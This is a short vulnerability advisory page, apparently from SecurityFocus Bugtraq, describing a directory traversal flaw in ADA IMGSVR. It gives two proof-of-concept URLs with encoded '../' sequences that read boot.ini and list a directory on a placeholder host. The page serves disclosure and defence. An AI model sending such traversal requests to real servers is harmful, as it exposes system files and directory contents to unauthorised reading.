Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ADA IMGSVR Directory Traversal Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini

To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/







 

Privacy Statement
Copyright 2009, SecurityFocus